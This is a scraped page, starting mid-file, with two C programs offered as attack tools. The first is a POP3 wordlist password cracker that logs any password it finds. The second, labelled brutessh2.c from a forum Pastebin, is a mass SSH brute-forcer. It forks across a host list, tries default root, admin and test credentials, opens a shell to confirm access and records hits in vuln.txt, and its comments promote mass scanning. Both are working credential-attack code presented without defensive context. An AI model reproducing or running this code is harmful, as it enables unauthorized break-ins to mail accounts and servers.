passtime; clock_t idlestart, idletime; clock_t starttime, endtime, finaltime; #endif char success = 0; char buf[BUFSIZE], pass[PASSLEN]; /* ------------------------------------------------------ */ if ((argc <= 3) || (argc > 5)) { fprintf(stderr, "Usage: %s <wordlist> <user> <host> [port]\n", argv[0]); exit(1); } user = argv[2], host = argv[3]; if (argc == 5) port = atoi(argv[4]); #ifdef WINDOWS if (WSAStartup(MAKEWORD(1, 1), &wsaData) < 0) { fprintf(stderr, "Error with WSAStartup(). " "Do you have WinSock installed?\n"); exit(-1); } #endif sockfd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP); memset(&srcin, 0, sizeof(SOCKADDR_IN)); memset(&dstin, 0, sizeof(SOCKADDR_IN)); if (inet_addr(argv[3]) != INADDR_NONE) dstin.sin_addr.s_addr = inet_addr(argv[3]); else { he = gethostbyname(host); if (!he) { fprintf(stderr, "Error with gethostbyname(%s): %s\n", argv[3], strerror(h_errno)); closesocket(sockfd), exit(-1); } else dstin.sin_addr = *((struct in_addr *)(he->h_addr)); } srcin.sin_family = AF_INET; srcin.sin_addr.s_addr = INADDR_ANY; if (bind(sockfd, (SOCKADDR *)&srcin, sizeof(SOCKADDR)) == SOCKET_ERROR) { fprintf(stderr, "error with bind(): %s\n", strerror(errno)); closesocket(sockfd); WSACleanup(); exit(-1); } dstin.sin_family = AF_INET; dstin.sin_port = htons(port); printf("Now connecting to %s[%d]... ", inet_ntoa(dstin.sin_addr), port); fflush(stdout); if (connect(sockfd, (SOCKADDR *)&dstin, sizeof(SOCKADDR)) == SOCKET_ERROR) { fprintf(stderr, "\nError connecting to %s[%d]: %s\n", inet_ntoa(*((struct in_addr *)(he->h_addr))), port, strerror(errno)); closesocket(sockfd); WSACleanup(); exit(-1); } printf("connected.\n"); memset(buf, 0, sizeof(buf)); /* Grab POP welcome message */ if (recv(sockfd, buf, sizeof(buf) - 1, 0) == SOCKET_ERROR) { fprintf(stderr, "Error with recv(): %s\n", strerror(errno)); fclose(file); closesocket(sockfd); WSACleanup(); exit(-1); } printf("%s\n\n", buf); /* -------------------------------------------------- */ #ifndef NOBENCHMARK starttime = clock(); #endif sprintf(buf, "USER %s\n", user); #ifdef DEBUG printf("Sending: %s", buf); #endif if (send(sockfd, buf, strlen(buf), 0) == SOCKET_ERROR) { fprintf(stderr, "Error send()'ing username: %s\n", strerror(errno)); fclose(file); closesocket(sockfd); WSACleanup(); exit(-1); } /* Check result of USER */ while (1) { #ifndef NOBENCHMARK idletime = 0, idlestart = clock(); #endif if (recv(sockfd, buf, sizeof(buf)-1, 0) == SOCKET_ERROR) { fprintf(stderr, "Error recv()'ing USER response: %s\n", strerror(errno)); fclose(file); closesocket(sockfd); WSACleanup(); exit(-1); } #ifndef NOBENCHMARK idletime += clock() - idlestart; #endif ptr = strchr(buf, '+'); if (ptr) break; else { ptr = strchr(buf, '-'); if (ptr) break; } } #ifdef DEBUG printf("USER response: %s\n", ptr); #endif if (strncmp(ptr, "-ERR", 4) == 0) { fprintf(stderr, "Error with USER: %s\n", ptr); fclose(file); closesocket(sockfd); WSACleanup(); exit(-1); } /* -------------------------------------------------- */ file = fopen(argv[1], "r"); if (!file) { fprintf(stderr, "Error fopen()'ing %s: %s\n", argv[1], strerror(errno)); closesocket(sockfd); WSACleanup(); exit(-1); } #ifndef NOBENCHMARK cracktime = clock(); signal(SIGALRM, calckeys), alarm(60); time1 = time(NULL); #endif while (1) { if (!fgets(pass, sizeof(pass)-1, file)) { if (feof(file)) break; fprintf(stderr, "Error with fget()'ing wordlist: %s\n", strerror(errno)); fclose(file); closesocket(sockfd); WSACleanup(); exit(-1); } ptr = strchr(pass, '\n'); if (ptr) *ptr = '\0'; /* -------------------------------------------------- */ #ifndef NOBENCHMARK beginpass = clock(); #endif sprintf(buf, "PASS %s\n", pass); #ifdef DEBUG printf("Sending: %s", buf); #endif if (send(sockfd, buf, strlen(buf), 0) == SOCKET_ERROR) { sprintf(buf, "Error send()'ing password: %s\n", strerror(errno)); fputc('\n', stderr), fputs(buf, stderr), fclose(file); file = fopen(ERRORLOG, "a"); if (file) { fputs(buf, file); fprintf(file, "'%s' was not completed " "(finished %.0f passwords).\n\n", argv[1], numkeys); fclose(file); } else fprintf(stderr, "Error fopen()'ing %s: %s\n", ERRORLOG, strerror(errno)); closesocket(sockfd); WSACleanup(); exit(-1); } #ifndef NOBENCHMARK passtime = 0; #endif /* Check result of PASS */ while (1) { #ifndef NOBENCHMARK idlestart = clock(); #endif if (recv(sockfd, buf, sizeof(buf)-1, 0) == SOCKET_ERROR) { sprintf(buf, "Error recv()'ing PASS response: %s\n", strerror(errno)); fputc('\n', stderr), fputs(buf, stderr), fclose(file); file = fopen(ERRORLOG, "a"); if (file) { fputs(buf, file); fprintf(file, "'%s' was not completed " "(finished %.0f passwords).\n\n", argv[1], numkeys); fclose(file); } else fprintf(stderr, "Error fopen()'ing %s: %s\n", ERRORLOG, strerror(errno)); closesocket(sockfd); WSACleanup(); exit(-1); } #ifndef NOBENCHMARK idletime += clock() - idlestart; #endif ptr = strchr(buf, '+'); if (ptr) break; else { ptr = strchr(buf, '-'); if (ptr) break; } } numkeys++; #ifndef NOBENCHMARK if (!passtime) passtime = clock() - beginpass; #endif #ifdef DEBUG printf("PASS response: %s\n", ptr); #endif #ifndef NOBENCHMARK time2 = time(NULL), time2 -= time1, tm = gmtime(&time2); strftime(timebuf, 15, "%H:%M:%S", tm); printf("[Time running: %s, Clock ticks: %ld, Password: %.0f]\r", timebuf, clock() - starttime, numkeys); fflush(stdout); #endif if (strncmp(ptr, "+OK", 3) == 0) { success = 1; break; } } #ifndef NOBENCHMARK alarm(0), endtime = clock(); finaltime = endtime - starttime, cracktime = endtime - cracktime; #endif fclose(file); closesocket(sockfd); WSACleanup(); printf("\nCompleted %.0f passwords with %d socket(s).\a\n\n", numkeys, NUMSOCKS); #ifndef NOBENCHMARK printf("Total clock ticks: %ld.\n", finaltime); if (minkeys) printf("Tried around %.0f passwords a minute.\n", minkeys); else printf("Tried %.0f passwords in less than a minute.\n", numkeys); printf("Took around %ld clock ticks per password.\n", passtime); printf("Spent a total of %ld clock ticks idling in recv().\n", idletime); printf("Took %ld clock ticks for the main cracking loop.\n\n", cracktime); printf("These results may be off, due to this benchmark\n"); #endif if (success) { printf("PASSWORD OF '%s' IS '%s'!\a\n", user, pass); file = fopen(SUCCESSLOG, "a"); if (file) { if (success) sprintf(buf, "PASSWORD OF '%s' IS '%s'\n", user, pass); fputs(buf, file), fclose(file); } else fprintf(stderr, "Error fopen()'ing %s: %s\n", SUCCESSLOG, strerror(errno)); } file = fopen(COMPLETELOG, "a"); if (file) { fprintf(file, "'%s' completed, %s's password was%sfound.\n", argv[1], user, (success ? " " : " not ")); fclose(file); } else fprintf(stderr, "Error fopen()'ing %s: %s\n", COMPLETELOG, strerror(errno)); if (!success) printf("%s's password was not in '%s'\n", user, argv[1]); return 0; }
  23. [C] rstforums.com - brutessh2.c - Pastebin.com /* *the first brutessh was only for guest & test logins *brutessh2 is a brute for sshd port which attempts to login as root with more than 2000 passwords. *users guest , test , nobody and admin with no passwords are included. *feel free to add more passwords and more users *by Zorg *For mass use a synscan : *Eg: ./biggssh sship.txt * Ok.Try This : Hostname root:12345 */ #include <stdio.h> #include <unistd.h> #include <stdlib.h> #include <string.h> #include <termios.h> #include <sys/select.h> #include <sys/time.h> #include <signal.h> #include <errno.h> #include <libssh/libssh.h> #include <libssh/sftp.h> #include <arpa/inet.h> #include <stdio.h> #include <netdb.h> #include <string.h> #include <fcntl.h> #include <unistd.h> #include <time.h> #include <stdlib.h> #include <sys/types.h> #include <sys/socket.h> #include <sys/wait.h> #include <netinet/in.h> int flag; int where; int shell(SSH_SESSION *session){ struct timeval tv; int err; char cmd[]="uname -r -s\n"; char rd[2048]; BUFFER *readbuf=buffer_new(); time_t start,acum; CHANNEL *channel; channel = open_session_channel(session,1000,1000); if(isatty(0)) err=channel_request_pty(channel); // printf("channel request pty > %d\n",err); err= channel_request_shell(channel); // printf("channel request shell > %d\n",err); start=time(0); while (channel->open!=0) { usleep(500000); err=channel_poll(channel,0); if(err>0) { err=channel_read(channel,readbuf,0,0); } else { if(start+5<time(0)) { //printf("5 secs passed\n"); return 1; } } } return 0; } void checkauth(char *user,char *password,char *host) { char warn[125]=""; SSH_SESSION *session; SSH_OPTIONS *options; int argc=1; char *argv[]={"none"}; FILE *fp; if(where%20==0) { fp=fopen("log.bigsshf","a"); fprintf(fp,"tring ssh %s@%s %s\n",user,host,password); fclose(fp); } where++; alarm(10); options=ssh_getopt(&argc,argv); options_set_username(options,user); options_set_host(options,host); session=ssh_connect(options); if(!session) return ; if(ssh_userauth_password(session,NULL,password) != AUTH_SUCCESS) { ssh_disconnect(session); return; } if(shell(session)) { if(flag) strcpy(warn,"DUP "); fp=fopen("vuln.txt","a+"); fprintf(fp,"%s%s:%s:%s\n",warn,user,password,host); printf("%sOk.TRY This : %s:%s:%s\n",warn,user,password,host); flag=1; } else printf("nologin -> %s:%s:%s\n",user,password,host); } int main(int argc, char **argv) { FILE *fp; char *c; char buff[1024]; int numforks; int maxf; if(argc!=2) { printf("./bigssh <sship.txt>\n"); printf("by Zorg\n"); exit(0); } unlink("log.bigsshf"); fp=fopen("sship.log","r"); if(fp==NULL) exit(printf("nu pot deschide sship.txt\n")); maxf=atoi(argv[1]); while(fgets(buff,sizeof(buff),fp)) { c=strchr(buff,'\n'); if(c!=NULL) *c='\0'; if (!(fork())) { //child where=0; checkauth("test","test",buff); checkauth("guest","guest",buff); checkauth("admin","admins",buff); checkauth("admin","admin",buff); checkauth("user","user",buff); checkauth("root","password",buff); checkauth("root","root",buff); checkauth("root","123456",buff); checkauth("test","123456",buff); checkauth("test","12345",buff); checkauth("test","1234",buff); checkauth("test","123",buff); checkauth("root","!@#$%",buff); checkauth("root","!@#$%^",buff); checkauth("root","!@#$%^&",buff); checkauth("root","!@#$%^&*",buff); checkauth("root","*",buff); checkauth("root","000000",buff); checkauth("root","00000000",buff); exit(0); } else { //parent numforks++; if (numforks > maxf) for (numforks; numforks > maxf; numforks--) wait(NULL); } } }
×
×
  • Create New...